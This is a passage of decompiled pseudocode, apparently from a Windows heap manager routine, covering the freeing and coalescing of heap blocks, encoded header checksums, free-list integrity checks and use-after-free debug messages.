																	_t1034 = _t1034 - 4;
																	__eflags = _t1034;
																	_v172 = _t1034;
																}
															}
															_t941 = E1E6A80A0(_t1300 + 0x10, _t1034, 0xfeeefeee);
															_v72 = _t941;
															__eflags = _t941 - _t1034;
															if(_t941 != _t1034) {
																_t1140 =  *[fs:0x30];
																__eflags =  *(_t1140 + 0xc);
																if( *(_t1140 + 0xc) == 0) {
																	_push("HEAP: ");
																	E1E64B910();
																	_t1328 = _t1324 + 4;
																} else {
																	E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	_t1328 = _t1324 + 8;
																}
																_push(_v72 + 0x10 + _t1300);
																E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1300);
																_t1324 = _t1328 + 0xc;
																_t947 =  *[fs:0x30];
																__eflags =  *((char*)(_t947 + 2));
																if( *((char*)(_t947 + 2)) != 0) {
																	 *0x1e7447a1 = 1;
																	 *0x1e744100 = _t1300;
																	asm("int3");
																	 *0x1e7447a1 = 0;
																}
															}
														}
														 *(_t1300 + 2) = 0;
														 *((char*)(_t1300 + 7)) = 0;
														_t1019 = _t1300;
														_v176 = _t1019;
														_t1138 = _v48 + ( *_t1300 & 0x0000ffff);
														_v48 = _t1138;
														 *_t1300 = _t1138;
														 *(_t1300 + 4 + _v48 * 8) =  *(_t1280 + 0x54) ^ _v48;
													} else {
														_t951 = E1E64F5C7(_t1280, _t1300);
														__eflags = _t951;
														if(_t951 != 0) {
															goto L94;
														} else {
															E1E64F113(_t1280, _t1300,  *_t1300 & 0x0000ffff, 1);
														}
													}
												}
											}
											L106:
											_t1195 = _v48;
										}
									}
									_t1286 = _t1019 + _t1195 * 8;
									_v36 = _t1286;
									__eflags =  *(_t1280 + 0x4c);
									if( *(_t1280 + 0x4c) == 0) {
										L111:
										_v86 = 1;
									} else {
										_t923 =  *_t1286;
										_v284 = _t923;
										_t1252 =  *(_t1280 + 0x50) ^ _t923;
										_v284 = _t1252;
										__eflags = _t1252 >> 0x18 - (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252);
										if(_t1252 >> 0x18 == (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252)) {
											_t1195 = _v48;
											goto L111;
										} else {
											_v86 = 0;
											E1E715FED(3, _t1280, _t1286, 0, 0, 0);
											_t1195 = _v48;
											while(1) {
												L112:
												_t1087 =  *(_t1280 + 0x4c);
												_t853 = _t1087 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1286 + 2);
												__eflags = _t853 & 0x00000001;
												if((_t853 & 0x00000001) != 0) {
													break;
												}
												__eflags = _t1087;
												if(_t1087 != 0) {
													_t1232 =  *(_t1280 + 0x50) ^  *_t1286;
													 *_t1286 = _t1232;
													_t1124 = _t1232 >> 0x00000010 ^ _t1232 >> 0x00000008 ^ _t1232;
													__eflags = _t1232 >> 0x18 - _t1124;
													if(__eflags != 0) {
														_push(_t1124);
														E1E70D646(_t1019, _t1280, _t1286, _t1280, _t1286, __eflags);
													}
												}
												__eflags = _v60;
												if(_v60 != 0) {
													_t897 = _t1019 + 8;
													_t1308 =  *_t897;
													_v72 = _t1308;
													_t1110 =  *((intOrPtr*)(_t1019 + 0xc));
													_v96 = _t1110;
													_t1111 =  *_t1110;
													_t1226 =  *((intOrPtr*)(_t1308 + 4));
													__eflags = _t1111 - _t1226;
													if(_t1111 != _t1226) {
														L139:
														E1E715FED(0xd, _t1280, _t897, _t1226, _t1111, 0);
													} else {
														__eflags = _t1111 - _t897;
														if(_t1111 != _t897) {
															goto L139;
														} else {
															 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1019 & 0x0000ffff);
															_t1228 =  *(_t1280 + 0xb4);
															__eflags = _t1228;
															if(_t1228 != 0) {
																_t1119 =  *_t1019 & 0x0000ffff;
																while(1) {
																	_t1310 =  *((intOrPtr*)(_t1228 + 4));
																	__eflags = _t1119 - _t1310;
																	if(_t1119 < _t1310) {
																		break;
																	}
																	_t919 =  *_t1228;
																	__eflags = _t919;
																	if(_t919 != 0) {
																		_t1228 = _t919;
																		continue;
																	} else {
																		_t1119 = _t1310 - 1;
																	}
																	break;
																}
																_v180 = _t1119;
																E1E66036A(_t1280, _t1228, 1, _t1019 + 8, _t1119,  *_t1019 & 0x0000ffff);
																_t1308 = _v72;
															}
															_t900 = _v96;
															 *_t900 = _t1308;
															 *((intOrPtr*)(_t1308 + 4)) = _t900;
															__eflags =  *(_t1019 + 2) & 0x00000008;
															if(( *(_t1019 + 2) & 0x00000008) == 0) {
																L129:
																_t1113 =  *(_t1019 + 2);
																__eflags = _t1113 & 0x00000004;
																if((_t1113 & 0x00000004) != 0) {
																	_t1309 = ( *_t1019 & 0x0000ffff) * 8 - 0x10;
																	_v184 = _t1309;
																	__eflags = _t1113 & 0x00000002;
																	if((_t1113 & 0x00000002) != 0) {
																		__eflags = _t1309 - 4;
																		if(_t1309 > 4) {
																			_t1309 = _t1309 - 4;
																			__eflags = _t1309;
																			_v184 = _t1309;
																		}
																	}
																	_t903 = E1E6A80A0(_t1019 + 0x10, _t1309, 0xfeeefeee);
																	_v72 = _t903;
																	__eflags = _t903 - _t1309;
																	if(_t903 != _t1309) {
																		_t1114 =  *[fs:0x30];
																		__eflags =  *(_t1114 + 0xc);
																		if( *(_t1114 + 0xc) == 0) {
																			_push("HEAP: ");
																			E1E64B910();
																			_t1327 = _t1324 + 4;
																		} else {
																			E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																			_t1327 = _t1324 + 8;
																		}
																		_push(_v72 + 0x10 + _t1019);
																		E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1019);
																		_t1324 = _t1327 + 0xc;
																		_t909 =  *[fs:0x30];
																		__eflags =  *((char*)(_t909 + 2));
																		if( *((char*)(_t909 + 2)) != 0) {
																			 *0x1e7447a1 = 1;
																			 *0x1e744100 = _t1019;
																			asm("int3");
																			 *0x1e7447a1 = 0;
																		}
																	}
																}
															} else {
																_t913 = E1E64F5C7(_t1280, _t1019);
																__eflags = _t913;
																if(_t913 != 0) {
																	goto L129;
																} else {
																	E1E64F113(_t1280, _t1019,  *_t1019 & 0x0000ffff, 1);
																}
															}
														}
													}
													_v60 = 0;
													_t1286 = _v36;
												}
												_t299 = _t1286 + 8; // 0x106
												_t1224 = _t299;
												_v72 = _t1224;
												_t1088 =  *_t1224;
												_v104 = _t1088;
												_t854 =  *(_t1286 + 0xc);
												_v128 = _t854;
												_t855 =  *_t854;
												_t1089 =  *((intOrPtr*)(_t1088 + 4));
												__eflags = _t855 - _t1089;
												if(_t855 != _t1089) {
													L191:
													E1E715FED(0xd, _t1280, _t1224, _t1089, _t855, 0);
													goto L192;
												} else {
													__eflags = _t855 - _t1224;
													if(_t855 != _t1224) {
														goto L191;
													} else {
														 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1286 & 0x0000ffff);
														_t1091 =  *(_t1280 + 0xb4);
														_v32 = _t1091;
														__eflags = _t1091;
														if(_t1091 != 0) {
															_t878 =  *_t1286 & 0x0000ffff;
															_v80 = _t878;
															while(1) {
																_t1302 =  *(_t1091 + 4);
																__eflags = _t878 - _t1302;
																if(_t878 < _t1302) {
																	break;
																}
																_t879 =  *_t1091;
																__eflags = _t879;
																if(_t879 != 0) {
																	_t1091 = _t879;
																	_v32 = _t1091;
																	_t878 = _v80;
																	continue;
																} else {
																	_t1303 = _t1302 - 1;
																	__eflags = _t1303;
																	_v124 = _t1303;
																}
																L149:
																_v56 = _t1303;
																_t1238 = _t1303 -  *((intOrPtr*)(_t1091 + 0x14));
																_v44 = _t1238;
																__eflags =  *(_t1091 + 8);
																_t880 = _t1238 + _t1238;
																if( *(_t1091 + 8) == 0) {
																	_t880 = _t1238;
																}
																_t1239 = _t880 * 4;
																_v84 = _t1239;
																_t882 =  *((intOrPtr*)(_t1091 + 0x20)) + _t1239;
																_v52 = _t882;
																_v96 =  *_t882;
																 *((intOrPtr*)(_t1091 + 0xc)) =  *((intOrPtr*)(_t1091 + 0xc)) - 1;
																_t884 =  *(_t1091 + 4);
																_t1240 = _t884 - 1;
																_v120 = _t1240;
																__eflags = _t1303 - _t1240;
																if(_t1303 == _t1240) {
																	_t328 = _t1091 + 0x10;
																	 *_t328 =  *(_t1091 + 0x10) - 1;
																	__eflags =  *_t328;
																}
																_t1304 = _v72;
																__eflags = _v96 - _t1304;
																if(_v96 == _t1304) {
																	_v192 = _t884;
																	__eflags =  *_t1091;
																	if( *_t1091 == 0) {
																		_t884 = _v120;
																		_v192 = _t884;
																	}
																	_t1305 =  *_t1304;
																	_v72 =  *((intOrPtr*)(_t1091 + 0x18));
																	__eflags = _v56 - _t884;
																	_t1242 = _v44;
																	if(_v56 >= _t884) {
																		_t885 = _v52;
																		__eflags = _t1305 - _v72;
																		if(_t1305 == _v72) {
																			 *_t885 = 0;
																			goto L170;
																		} else {
																			 *_t885 = _t1305;
																			goto L164;
																		}
																		goto L187;
																	} else {
																		__eflags = _t1305 -  *((intOrPtr*)(_t1091 + 0x18));
																		if(_t1305 ==  *((intOrPtr*)(_t1091 + 0x18))) {
																			L169:
																			 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = 0;
																			L170:
																			_v44 = _t1242 & 0x0000001f;
																			 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) &  !(1 << _v44);
																		} else {
																			_t1247 =  *(_t1305 - 8);
																			_v292 = _t1247;
																			__eflags =  *(_t1280 + 0x4c);
																			if( *(_t1280 + 0x4c) != 0) {
																				_t1247 = _t1247 ^  *(_t1280 + 0x50);
																				_v72 = _t1247;
																				_v292 = _t1247;
																				__eflags = _t1247 >> 0x18 - (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247);
																				if(_t1247 >> 0x18 != (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247)) {
																					E1E715FED(3, _t1280, _t1305 - 8, 0, 0, 0);
																					_t1247 = _v72;
																				}
																				_t1091 = _v32;
																			}
																			_t1249 = _v80 - (_t1247 & 0x0000ffff);
																			__eflags = _t1249;
																			_v240 = _t1249;
																			if(_t1249 != 0) {
																				_t1242 = _v44;
																				goto L169;
																			} else {
																				 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = _t1305;
																			}
																		}
																	}
																}
																L164:
																_t1286 = _v36;
																goto L165;
															}
															_v124 = _t878;
															_t1303 = _t878;
															goto L149;
														}
														L165:
														_t858 = _v104;
														_t1092 = _v128;
														 *_t1092 = _t858;
														_t858[2] = _t1092;
														__eflags =  *(_t1286 + 2) & 0x00000008;
														if(( *(_t1286 + 2) & 0x00000008) == 0) {
															L175:
															_t1093 =  *(_t1286 + 2);
															__eflags = _t1093 & 0x00000004;
															if((_t1093 & 0x00000004) != 0) {
																_t1301 = ( *_t1286 & 0x0000ffff) * 8 - 0x10;
																_v196 = _t1301;
																__eflags = _t1093 & 0x00000002;
																if((_t1093 & 0x00000002) != 0) {
																	__eflags = _t1301 - 4;
																	if(_t1301 > 4) {
																		_t1301 = _t1301 - 4;
																		__eflags = _t1301;
																		_v196 = _t1301;
																	}
																}
																_t865 = E1E6A80A0(_v36 + 0x10, _t1301, 0xfeeefeee);
																_v72 = _t865;
																__eflags = _t865 - _t1301;
																if(_t865 == _t1301) {
																	_t1286 = _v36;
																} else {
																	_t1097 =  *[fs:0x30];
																	__eflags =  *(_t1097 + 0xc);
																	if( *(_t1097 + 0xc) == 0) {
																		_push("HEAP: ");
																		E1E64B910();
																	} else {
																		E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_t1286 = _v36;
																	_push(_v72 + 0x10 + _t1286);
																	E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1286);
																	_t871 =  *[fs:0x30];
																	__eflags =  *((char*)(_t871 + 2));
																	if( *((char*)(_t871 + 2)) != 0) {
																		 *0x1e7447a1 = 1;
																		 *0x1e744100 = _t1286;
																		asm("int3");
																		 *0x1e7447a1 = 0;
																	}
																}
															}
															 *(_t1019 + 2) = 0;
															 *((char*)(_t1019 + 7)) = 0;
															_t1095 = _v48 + ( *_t1286 & 0x0000ffff);
															_v48 = _t1095;
															 *_t1019 = _t1095;
															_t1096 = _v48;
															_t861 =  *(_t1280 + 0x54) ^ _t1096;
															__eflags = _t861;
															 *(_t1019 + 4 + _t1096 * 8) = _t861;
															_t1195 = _v48;
														} else {
															_t875 = E1E64F5C7(_t1280, _t1286);
															__eflags = _t875;
															if(_t875 != 0) {
																goto L175;
															} else {
																E1E64F113(_t1280, _t1286,  *_t1286 & 0x0000ffff, 1);
																L192:
																_t1195 = _v48;
																continue;
															}
														}
													}
												}
												break;
											}
											L187:
											_a4 = _t1019;
											goto L188;
										}
									}
									goto L112;
								}
								L188:
								__eflags = _t1195 -  *((intOrPtr*)(_t1280 + 0x6c));
								if(_t1195 <  *((intOrPtr*)(_t1280 + 0x6c))) {
									L193:
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <=  *((intOrPtr*)(_t1280 + 0x70))) {
										L197:
										__eflags = _t1195 - 0xfe00;
										if(_t1195 > 0xfe00) {
											_t1196 = _t1019;
											_t1045 = _t1280;
											E1E660B10(_t1045, _t1196, _t1195);
										} else {
											__eflags = _v37;
											if(_v37 == 0) {
												_t1291 = _t1195 & 0x0000ffff;
												 *(_t1019 + 2) =  *(_t1019 + 2) & 0x000000f0;
												 *((char*)(_t1019 + 7)) = 0;
												__eflags =  *(_t1280 + 0x40) & 0x00000040;
												if(( *(_t1280 + 0x40) & 0x00000040) != 0) {
													E1E6A8140(_t1019 + 0x10, _t1291 * 8 - 0x10, 0xfeeefeee);
													_t577 = _t1019 + 2;
													 *_t577 =  *(_t1019 + 2) | 0x00000004;
													__eflags =  *_t577;
												}
												_t760 = _t1280 + 0xc0;
												__eflags =  *(_t1280 + 0xb4);
												if( *(_t1280 + 0xb4) == 0) {
													_t1199 =  *_t760;
												} else {
													_t1199 = E1E651C0E(_t1280, _t1291);
													_t760 = _t1280 + 0xc0;
												}
												while(1) {
													__eflags = _t760 - _t1199;
													if(_t760 == _t1199) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1051 =  *(_t1199 - 8);
														_v110 = _t1051;
													} else {
														_t1051 =  *(_t1199 - 8);
														_v100 = _t1051;
														__eflags =  *(_t1280 + 0x4c) & _t1051;
														if(( *(_t1280 + 0x4c) & _t1051) != 0) {
															_t1051 = _t1051 ^  *(_t1280 + 0x50);
															__eflags = _t1051;
															_v100 = _t1051;
														}
														_v110 = _t1051;
														_t1019 = _a4;
													}
													__eflags = _t1291 - (_t1051 & 0x0000ffff);
													if(_t1291 > (_t1051 & 0x0000ffff)) {
														_t1199 =  *_t1199;
														_t760 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t761 = _t1019 + 8;
												_t1045 =  *(_t1199 + 4);
												_t1286 =  *_t1045;
												__eflags = _t1286 - _t1199;
												if(_t1286 != _t1199) {
													__eflags = 0;
													_t1045 = 0xd;
													E1E715FED(0xd, 0, _t1199, 0, _t1286, 0);
												} else {
													 *_t761 = _t1199;
													 *(_t761 + 4) = _t1045;
													 *_t1045 = _t761;
													 *(_t1199 + 4) = _t761;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1196 =  *(_t1280 + 0xb4);
												__eflags = _t1196;
												if(_t1196 != 0) {
													_t1050 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t768 =  *(_t1196 + 4);
														__eflags = _t1050 - _t768;
														if(_t1050 < _t768) {
															break;
														}
														_t1286 =  *_t1196;
														__eflags = _t1286;
														if(_t1286 != 0) {
															_t1196 = _t1286;
															continue;
														} else {
															_t1050 = _t768 - 1;
														}
														break;
													}
													_v208 = _t1050;
													_t1045 = _t1280;
													E1E651B5D(_t1045, _t1196, 1, _t1019 + 8, _t1050,  *_t1019 & 0x0000ffff);
												}
											} else {
												_t777 = _t1195 & 0x0000ffff;
												_v32 = _t777;
												 *(_t1019 + 2) = 0;
												 *((char*)(_t1019 + 7)) = 0;
												_t1202 = _t1280 + 0xc0;
												_t1292 =  *(_t1280 + 0xb4);
												_v44 = _t1292;
												__eflags = _t1292;
												if(_t1292 == 0) {
													_t1053 =  *_t1202;
												} else {
													while(1) {
														_t1056 =  *((intOrPtr*)(_t1292 + 4));
														__eflags = _t777 - _t1056;
														if(_t777 < _t1056) {
															goto L203;
														}
														_t842 =  *_t1292;
														__eflags = _t842;
														if(_t842 != 0) {
															_t1292 = _t842;
															_v44 = _t1292;
															_t777 = _v32;
															continue;
														} else {
															_t777 = _t1056 - 1;
															while(1) {
																L203:
																_v52 = _t777;
																_v144 = _t777;
																_v36 = _t777 -  *(_t1292 + 0x14);
																_v96 = 0;
																_t1215 =  *(_t1292 + 0x18);
																_v80 = _t1215;
																_t801 =  *((intOrPtr*)(_t1215 + 4));
																__eflags = _t1215 - _t801;
																if(_t1215 != _t801) {
																	goto L205;
																}
																_t1053 = _t1215;
																L244:
																__eflags = _t1053;
																if(_t1053 == 0) {
																	L247:
																	_t1292 =  *_t1292;
																	_v44 = _t1292;
																	_t777 =  *(_t1292 + 0x14);
																	continue;
																}
																_t1202 = _t1280 + 0xc0;
																goto L250;
																L205:
																_t802 = _t801 + 0xfffffff8;
																_v72 = _t802;
																_t1026 =  *_t802;
																_v300 = _t1026;
																__eflags =  *(_t1280 + 0x4c);
																if( *(_t1280 + 0x4c) != 0) {
																	_t1026 = _t1026 ^  *(_t1280 + 0x50);
																	_v300 = _t1026;
																	__eflags = _t1026 >> 0x18 - (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026);
																	if(_t1026 >> 0x18 != (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026)) {
																		E1E715FED(3, _t1280, _v72, 0, 0, 0);
																		_t1215 = _v80;
																	}
																}
																_t1058 = _v32 - (_t1026 & 0x0000ffff);
																_v244 = _t1058;
																__eflags = _t1058;
																if(_t1058 <= 0) {
																	_t805 =  *_t1215 + 0xfffffff8;
																	_v72 = _t805;
																	_t1027 =  *_t805;
																	_v308 = _t1027;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t1027 = _t1027 ^  *(_t1280 + 0x50);
																		_v308 = _t1027;
																		__eflags = _t1027 >> 0x18 - (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027);
																		if(_t1027 >> 0x18 != (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027)) {
																			E1E715FED(3, _t1280, _v72, 0, 0, 0);
																			_t1215 = _v80;
																		}
																	}
																	_t1060 = _v32 - (_t1027 & 0x0000ffff);
																	_v248 = _t1060;
																	__eflags = _t1060;
																	if(_t1060 > 0) {
																		__eflags =  *_t1292;
																		if( *_t1292 != 0) {
																			L228:
																			_t1061 = _v36;
																			_t1217 = _t1061 >> 5;
																			_v124 = ( *((intOrPtr*)(_t1292 + 4)) -  *(_t1292 + 0x14) >> 5) - 1;
																			_t812 =  *((intOrPtr*)(_t1292 + 0x1c)) + _t1217 * 4;
																			_t1030 = (_t1027 | 0xffffffff) << (_t1061 & 0x0000001f) &  *_t812;
																			__eflags = _t1030;
																			_t1063 = _v124;
																			while(1) {
																				_v200 = _t812;
																				_v140 = _t1217;
																				__eflags = _t1030;
																				if(_t1030 != 0) {
																					break;
																				}
																				__eflags = _t1217 - _t1063;
																				if(_t1217 > _t1063) {
																					__eflags = _t1030;
																					if(_t1030 == 0) {
																						_t1019 = _a4;
																						goto L247;
																					} else {
																						break;
																					}
																				} else {
																					_t812 =  &(_t812[1]);
																					_t1030 =  *_t812;
																					_t1217 = _t1217 + 1;
																					continue;
																				}
																				goto L244;
																			}
																			__eflags = _t1030;
																			if(_t1030 == 0) {
																				_t815 = _t1030 >> 0x00000010 & 0x000000ff;
																				__eflags = _t815;
																				if(_t815 == 0) {
																					_t817 = ( *((_t1030 >> 0x18) + 0x1e6289b0) & 0x000000ff) + 0x18;
																					__eflags = _t817;
																				} else {
																					_t817 = ( *(_t815 + 0x1e6289b0) & 0x000000ff) + 0x10;
																				}
																			} else {
																				_t820 = _t1030 & 0x000000ff;
																				__eflags = _t1030;
																				if(_t1030 == 0) {
																					_t817 = ( *((_t1030 >> 0x00000008 & 0x000000ff) + 0x1e6289b0) & 0x000000ff) + 8;
																				} else {
																					_t817 =  *(_t820 + 0x1e6289b0) & 0x000000ff;
																				}
																			}
																			_t1219 = (_t1217 << 5) + _t817;
																			_v140 = _t1219;
																			__eflags =  *(_t1292 + 8);
																			if( *(_t1292 + 8) != 0) {
																				_t1219 = _t1219 + _t1219;
																				__eflags = _t1219;
																			}
																			_t1053 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1219 * 4);
																			goto L243;
																		} else {
																			__eflags = _v52 -  *((intOrPtr*)(_t1292 + 4)) - 1;
																			if(_v52 !=  *((intOrPtr*)(_t1292 + 4)) - 1) {
																				goto L228;
																			} else {
																				_t1069 = _v36;
																				__eflags =  *(_t1292 + 8);
																				if( *(_t1292 + 8) != 0) {
																					_t1069 = _t1069 + _t1069;
																					__eflags = _t1069;
																				}
																				_t1298 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1069 * 4);
																				while(1) {
																					__eflags = _t1215 - _t1298;
																					if(_t1215 == _t1298) {
																						break;
																					}
																					_t1220 = _t1298 - 8;
																					_t1033 =  *(_t1298 - 8);
																					_v316 = _t1033;
																					__eflags =  *(_t1280 + 0x4c);
																					if( *(_t1280 + 0x4c) != 0) {
																						_t1033 = _t1033 ^  *(_t1280 + 0x50);
																						_v316 = _t1033;
																						__eflags = _t1033 >> 0x18 - (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033);
																						if(_t1033 >> 0x18 != (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033)) {
																							E1E715FED(3, _t1280, _t1220, 0, 0, 0);
																						}
																					}
																					_t1071 = _v32 - (_t1033 & 0x0000ffff);
																					_v252 = _t1071;
																					__eflags = _t1071;
																					if(_t1071 > 0) {
																						_t1298 =  *_t1298;
																						_t1215 = _v80;
																						continue;
																					} else {
																						_t1053 = _t1298;
																						_t1292 = _v44;
																					}
																					goto L243;
																				}
																				_t1053 = _v96;
																				_t1292 = _v44;
																				goto L243;
																			}
																		}
																	} else {
																		_t1053 =  *_t1215;
																		goto L243;
																	}
																} else {
																	_t1053 = _t1215;
																	L243:
																	_t1019 = _a4;
																}
																goto L244;
															}
														}
														goto L203;
													}
													goto L203;
												}
												L250:
												_t1293 = _v32;
												while(1) {
													__eflags = _t1202 - _t1053;
													if(_t1202 == _t1053) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1214 =  *(_t1053 - 8);
														_v108 = _t1214;
													} else {
														_t1214 =  *(_t1053 - 8);
														_v76 = _t1214;
														__eflags =  *(_t1280 + 0x4c) & _t1214;
														if(( *(_t1280 + 0x4c) & _t1214) != 0) {
															_t1214 = _t1214 ^  *(_t1280 + 0x50);
															__eflags = _t1214;
															_v76 = _t1214;
														}
														_v108 = _t1214;
														_t1019 = _a4;
													}
													__eflags = _t1293 - (_t1214 & 0x0000ffff);
													if(_t1293 > (_t1214 & 0x0000ffff)) {
														_t1053 =  *_t1053;
														_t1202 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t1196 = _t1019 + 8;
												_v96 = _t1196;
												_t778 =  *(_t1053 + 4);
												_t1286 =  *_t778;
												__eflags = _t1286 - _t1053;
												if(_t1286 != _t1053) {
													_t1196 = 0;
													__eflags = 0;
													_t513 = _t1196 + 0xd; // 0xd
													E1E715FED(_t513, 0, _t1053, 0, _t1286, 0);
												} else {
													 *_t1196 = _t1053;
													 *(_t1196 + 4) = _t778;
													 *_t778 = _t1196;
													 *(_t1053 + 4) = _t1196;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1045 =  *(_t1280 + 0xb4);
												_v52 = _t1045;
												__eflags = _t1045;
												if(_t1045 != 0) {
													_t1294 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t1203 =  *((intOrPtr*)(_t1045 + 4));
														__eflags = _t1294 - _t1203;
														if(_t1294 < _t1203) {
															break;
														}
														_t798 =  *_t1045;
														__eflags = _t798;
														if(_t798 != 0) {
															_t1045 = _t798;
															_v52 = _t1045;
															continue;
														} else {
															_t1294 = _t1203 - 1;
														}
														break;
													}
													_v204 = _t1294;
													_v72 =  *_t1019 & 0x0000ffff;
													_t1205 = _t1294 -  *((intOrPtr*)(_t1045 + 0x14));
													_v32 = _t1205;
													__eflags =  *(_t1045 + 8);
													_t782 = _t1205 + _t1205;
													if( *(_t1045 + 8) == 0) {
														_t782 = _t1205;
													}
													 *((intOrPtr*)(_t1045 + 0xc)) =  *((intOrPtr*)(_t1045 + 0xc)) + 1;
													_v56 = _t782 << 2;
													_v84 =  *((intOrPtr*)(_v56 +  *((intOrPtr*)(_t1045 + 0x20))));
													__eflags = _t1294 -  *((intOrPtr*)(_t1045 + 4)) - 1;
													_t1196 = _v32;
													if(_t1294 ==  *((intOrPtr*)(_t1045 + 4)) - 1) {
														_t535 = _t1045 + 0x10;
														 *_t535 =  *(_t1045 + 0x10) + 1;
														__eflags =  *_t535;
													}
													_t1295 = _v84;
													__eflags = _t1295;
													if(_t1295 == 0) {
														L277:
														_t788 =  *((intOrPtr*)(_t1045 + 0x20));
														_t1045 = _v56;
														 *(_t1045 + _t788) = _v96;
														_t1286 = _v84;
													} else {
														_t1023 =  *(_t1295 - 8);
														_v324 = _t1023;
														__eflags =  *(_t1280 + 0x4c);
														if( *(_t1280 + 0x4c) != 0) {
															_t1023 = _t1023 ^  *(_t1280 + 0x50);
															_v324 = _t1023;
															__eflags = _t1023 >> 0x18 - (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023);
															if(_t1023 >> 0x18 != (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023)) {
																E1E715FED(3, _t1280, _t1295 - 8, 0, 0, 0);
																_t1045 = _v52;
															}
															_t1196 = _v32;
														}
														_t1025 = _v72 - (_t1023 & 0x0000ffff);
														_v256 = _t1025;
														__eflags = _t1025;
														_t1019 = _a4;
														if(_t1025 <= 0) {
															goto L277;
														}
													}
													__eflags = _t1286;
													if(_t1286 == 0) {
														_t1286 = _t1196 >> 5;
														_v32 = _t1196 & 0x0000001f;
														_t1045 = _v32;
														_t1196 = 1 << _t1045;
														_t790 =  *((intOrPtr*)(_v52 + 0x1c));
														_t558 = _t790 + _t1286 * 4;
														 *_t558 =  *(_t790 + _t1286 * 4) | 0x00000001;
														__eflags =  *_t558;
													}
												}
											}
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
											}
										}
										_t1197 = _t1196 | 0xffffffff;
										__eflags = _v64;
										if(_v64 != 0) {
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
												if(__eflags != 0) {
													_push(_t1045);
													_t1197 = _t1019;
													E1E70D646(_t1019, _t1280, _t1197, _t1280, _t1286, __eflags);
												}
											}
											_t1047 =  *(_t1019 + 2) | 0x00000002;
											 *(_t1019 + 2) = _t1047;
											_t1290 = _t1019 + ( *_t1019 & 0x0000ffff) * 8;
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 1) ^ _t1047 ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *_t1019;
											}
											 *((short*)(_t1290 - 4)) = _v64;
											 *((short*)(_t1290 - 2)) = 0;
											__eflags =  *(_t1280 + 0x40) & 0x08000000;
											if(( *(_t1280 + 0x40) & 0x08000000) != 0) {
												 *((short*)(_t1290 - 2)) = E1E67FDB9(1, _t1197);
											}
											goto L315;
										}
									} else {
										__eflags = _t1195 - 0x200;
										if(_t1195 < 0x200) {
											goto L197;
										} else {
											__eflags =  *(_t1280 + 0x54) -  *(_t1019 + 4);
											if( *(_t1280 + 0x54) !=  *(_t1019 + 4)) {
												goto L197;
											} else {
												_t1197 = _t1019;
												E1E64F113(_t1280, _t1197, _t1195, 0);
												_v64 = 0;
												goto L315;
											}
										}
									}
								} else {
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <  *((intOrPtr*)(_t1280 + 0x70))) {
										goto L193;
									} else {
										_t1197 = _t1019;
										E1E64F113(_t1280, _t1197, _t1195, 0);
										L315:
										__eflags = _t1197 | 0xffffffff;
									}
								}
								_t1288 = 0;
								_a4 = 0;
							}
						} else {
